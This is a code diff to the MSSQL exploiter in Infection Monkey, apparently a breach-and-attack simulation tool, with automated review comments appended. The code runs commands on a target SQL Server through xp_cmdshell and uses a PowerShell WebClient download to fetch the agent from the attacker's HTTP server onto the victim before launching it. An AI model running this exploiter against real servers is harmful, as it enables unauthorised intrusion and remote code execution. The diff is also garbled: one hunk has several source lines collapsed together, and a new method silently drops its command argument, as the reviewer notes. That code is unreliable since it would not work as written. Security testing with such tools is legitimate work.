diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 8b378f418..f80dc3db6 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -37,7 +37,6 @@ class MSSQLExploiter(HostExploiter): XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_END = "'" EXPLOIT_COMMAND_PREFIX = "{payload_file_path}" MONKEY_DOWNLOAD_COMMAND = ( "powershell (new-object System.Net.WebClient)." "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@@ -133,9 +132,8 @@ class MSSQLExploiter(HostExploiter):
 sleep(MSSQLExploiter.QUERY_BUFFER)
 def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
- monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
+ self._write_download_command_to_batch_file(monkey_path_on_victim)
 self.run_payload_file()
- self.add_executed_cmd(monkey_download_command.command)
 def remove_temp_dir(self):
 # Remove temporary dir we stored payload at 
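Review bot: The removed `self.add_executed_cmd(monkey_download_command.command)` in `upload_monkey` changes what the executed-command telemetry records: previously the bare download command was reported once from here, while after the change recording is delegated to `_run_mssql_command`, which records whatever text it is handed (the batch-file write wrapper) rather than the download command itself. Whether the payload launch issued by `run_payload_file()` is still recorded cannot be confirmed from this hunk, since that method and the older `run_mssql_command` path are outside it. A one-line comment above the call would make the intent explicit for readers of the telemetry: `# executed-command telemetry for the download is recorded inside _run_mssql_command`.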
@@ -159,10 +157,24 @@ class MSSQLExploiter(HostExploiter):
 http_thread.stop()
 http_thread.join(LONG_REQUEST_TIMEOUT)
- def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
- monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
- self.run_mssql_command(monkey_download_command)
- return monkey_download_command
+ def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath):
+ agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
+ http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
+ )
+ self._write_command_to_batch_file(agent_download_command)
+
+ def _write_command_to_batch_file(self, command: str):
+ write_to_file_command = f"{self.payload_file_path}"
+ self._run_mssql_command(write_to_file_command)
+
+ # Note: This is a strangler used to replace self.run_mssql_command()
+ def _run_mssql_command(self, command: str):
+ logger.debug(f"Running command on SQL Server: {command}")
+
+ self.cursor.execute(f"xp_cmdshell '{command}'")
+ self.add_executed_cmd(command)
+
+ sleep(MSSQLExploiter.QUERY_BUFFER)
 def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
 # Form monkey's launch command
@@ -177,18 +189,6 @@ class MSSQLExploiter(HostExploiter):
 suffix=suffix,
 )
- def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
- monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
- http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
- )
- prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
- suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
- payload_file_path=self.payload_file_path
- )
- return MSSQLLimitedSizePayload(
- command=monkey_download_command, suffix=suffix, prefix=prefix
- )
-
 def brute_force(self, host, port, users_passwords_pairs_list):
 """
 Starts the brute force connection attempts and if needed then init the payload process.
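Review bot: As rendered here, `_write_command_to_batch_file` never uses its `command` parameter: `write_to_file_command = f"{self.payload_file_path}"` contains only the path, so `_run_mssql_command` would be handed the payload file name rather than a write-to-file instruction. This looks like an extraction artefact (the redirection text between `<` and `>>` that the old `EXPLOIT_COMMAND_PREFIX`/`EXPLOIT_COMMAND_SUFFIX` pair carried would be stripped as markup), but if the line really is what the commit contains, `command` is silently dropped and the batch file is never written — worth confirming against the repository. Independently, `_run_mssql_command` now records every command it runs via `add_executed_cmd`, so the recorded string is the batch-file write wrapper rather than the download command that `upload_monkey` used to record; the "strangler" comment should say so, e.g. a docstring along the lines of `"""Run *command* via xp_cmdshell, record it with add_executed_cmd, then wait QUERY_BUFFER; supersedes run_mssql_command."""`. The older `run_mssql_command` it is meant to replace is outside this hunk, so the two recording paths cannot be compared here.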